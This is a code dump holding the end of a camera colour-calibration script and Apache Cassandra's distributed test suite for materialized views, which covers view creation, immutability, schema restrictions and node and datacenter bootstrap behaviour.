intercept_x_max = 0.0
print_and_save(file_runtimes, "\n")
for i in range(len(out_dirs)):
intercepts = json.loads(open(out_dirs[i] + "/intercept_x.txt").read())
print_and_save(file_runtimes, camera_names[i] + ": " + str(intercepts) + "\n")
intercept_x_max = max(intercept_x_max, max(intercepts[0]))
intercept_x_min = min(intercept_x_min, min(intercepts[1]))
text_intercepts = ("Intercept Xmin max: " + str(intercept_x_max) + ", " +
"Intercept Xmax min: " + str(intercept_x_min) + "\n")
print_and_save(file_runtimes, text_intercepts)
thread_list = []
for i in range(len(out_dirs)):
serial_number = re.findall("(\d+)", camera_names[i])[0]
isp_src = out_dirs[i] + "/isp_out.json"
isp_dst = isp_dir + "/" + serial_number + ".json"
print "Copying " + isp_src + " to " + isp_dst + "..."
os.system("cp \"" + isp_src + "\" \"" + isp_dst + "\"")
flags_extra = " --update_clamps --clamp_min " + str(intercept_x_max) + " --clamp_max " + str(intercept_x_min)
color_calibrate_params = {
"SURROUND360_RENDER_DIR": surround360_render_dir,
"IMAGE_PATH": raw_charts[i],
"ILLUMINANT": illuminant,
"ISP_JSON": isp_dst,
"NUM_SQUARES_W": num_squares_w,
"NUM_SQUARES_H": num_squares_h,
"MIN_AREA_CHART_PERC": min_area_chart_perc,
"MAX_AREA_CHART_PERC": max_area_chart_perc,
"OUTPUT_DIR": out_dirs[i],
"LOG_DIR": out_dirs[i],
"FLAGS_EXTRA": flags_extra,
}
color_calibrate_command = COLOR_CALIBRATION_COMMAND_TEMPLATE.replace("\n", " ").format(**color_calibrate_params)
t = threading.Thread(target=run_step, args=(camera_names[i] + " update clamps", color_calibrate_command, file_runtimes,))
thread_list.append(t)
print "Updating ISP clamps..."
run_threads(thread_list)
save_step_runtime(file_runtimes, "TOTAL", timer() - start_time)
file_runtimes.close()
|
materialized_views_test.py
|
import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean, remove_perf_disable_shared_mem)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate([nodes, 0], install_byteman=install_byteman)
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, **kwargs)
create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def update_view(self, session, query, flush, compact=False):
session.execute(query)
self._replay_batchlogs()
if flush:
self.cluster.flush()
if compact:
self.cluster.compact()
def _settle_nodes(self):
logger.debug("Settling all nodes")
stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")
def _settled_stages(node):
(stdout, stderr, rc) = node.nodetool("tpstats")
lines = re.split("\n+", stdout)
for line in lines:
match = stage_match.match(line)
if match is not None:
active = int(match.group('active'))
pending = int(match.group('pending'))
if active != 0 or pending != 0:
logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
return False
return True
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and not _settled_stages(node):
time.sleep(0.1)
attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
logger.debug("waiting for view")
def _view_build_finished(node):
s = self.patient_exclusive_cql_connection(node)
query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(s.execute(query))
return len(result) == 0
for node in self.cluster.nodelist():
if node.is_running():
attempts = 50 # 1 sec per attempt, so 50 seconds total
while attempts > 0 and not _view_build_finished(node):
time.sleep(1)
attempts -= 1
if attempts <= 0:
raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
"""Wait for the start of a MV build, ensuring that it has saved some progress"""
start = time.time()
while True:
try:
query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(session.execute(query))
assert 0 == result[0].count
except AssertionError:
break
elapsed = (time.time() - start) / 60
if elapsed > wait_minutes:
self.fail("The MV build hasn't started in 2 minutes.")
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
self._settle_nodes()
def _replay_batchlogs(self):
for node in self.cluster.nodelist():
if node.is_running():
logger.debug("Replaying batchlog on node {}".format(node.name))
node.nodetool("replaybatchlog")
# CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
node_session = self.patient_exclusive_cql_connection(node)
result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
if exists:
assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
if self.cluster.version() >= '3.11':
assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
else:
assert_none(session, "SELECT * FROM system.built_views")
if self.cluster.version() >= '3.11':
assert_none(session, "SELECT * FROM system_distributed.view_build_status")
assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
"""
drop keyspace or view should clear built_views and view_build_status
"""
session = self.prepare(rf=2, nodes=2)
def populate_data(session, rows):
logger.debug("populate base data")
for v in range(rows):
session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))
def verify_data(session, rows, views):
logger.debug("verify view data")
for v in range(rows):
for view in range(views):
assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])
def create_keyspace(session, ks="ks1", rf=2):
create_ks(session, ks, rf)
def create_table(session):
logger.debug("create base table")
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
def create_views(session, views, keyspace="ks1"):
logger.debug("create view")
for view in range(views):
session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view))
for view in range(views):
self._wait_for_view(keyspace, "mv{}".format(view))
def drop_keyspace(session, keyspace="ks1"):
logger.debug("drop keyspace {}".format(keyspace))
session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace))
def drop_views(session, views):
logger.debug("drop all views")
for view in range(views):
session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))
rows = 100
views = 5
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_keyspace(session)
self._assert_view_meta(session, views, exists=False)
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_views(session, views)
self._assert_view_meta(session, views, exists=False)
def test_create(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting 1 materialized view == got" + str(result)
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the bease table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def test_insert(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
assert len(result) == 2, "Expecting {} users, got {}".format(2 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
assert len(result) == 1, "Expecting {} users, got {}".format(1 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
assert len(result) == 0, "Expecting {} users, got {}".format(0 == len(result))
def test_populate_mv_after_insert(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
"""Test that a view is OK when created with existing data with wide rows"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
for i in range(5):
for j in range(10000):
session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(5):
for j in range(10000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute(selectPrepared.bind(['TX'])))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute(selectPrepared.bind(['CA'])))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute(selectPrepared.bind(['MA'])))
assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state on base table with materialized views."
)
def test_drop_table(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 0, "Expecting {} materialized view, got {}".format(1, len(result))
def test_clustering_column(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
session.cluster.control_connection.wait_for_schema_agreement()
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
logger.debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Writing 1k to base")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Reading 1k from view")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Reading 1k from base")
for i in range(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
logger.debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
logger.debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
if nts:
session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
node4.nodetool('rebuild dc1')
node5.nodetool('rebuild dc1')
cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)
logger.debug("Verifying data from new node in view")
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Inserting 100 into base")
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Verify 100 in view")
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
"""
@jira_ticket CASSANDRA-12984
Assert that MVs are marked as build after bootstrap. Otherwise newly streamed MVs will be built again
"""
assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
self._base_test_insert_during_range_movement(rf=1)
def test_insert_during_range_movement_rf2(self):
self._base_test_insert_during_range_movement(rf=2)
def test_insert_during_range_movement_rf3(self):
self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
"""
@jira_ticket CASSANDRA-14251
Test that materialized views replication work in the middle of a join
for different replication factors.
"""
session = self.prepare(rf=rf)
logger.debug("Creating table and view")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Starting new node4 in write survey mode")
node4 = new_node(self.cluster)
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
"-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug("Insert data while node4 is joining")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Finish joining node4")
node4.nodetool("join")
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug("Verify data")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(10):
for j in range(100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(10):
for j in range(100):
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100):
if j % 10 == 0:
session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))
self.cluster.flush()
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster)
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100, 110):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(10):
for j in range(110):
if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with very wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(5):
for j in range(5000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(5):
for j in range(5000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster)
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(5):
for j in range(5000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(5):
for j in range(5100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(5):
for j in range(5100):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_allow_filtering(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
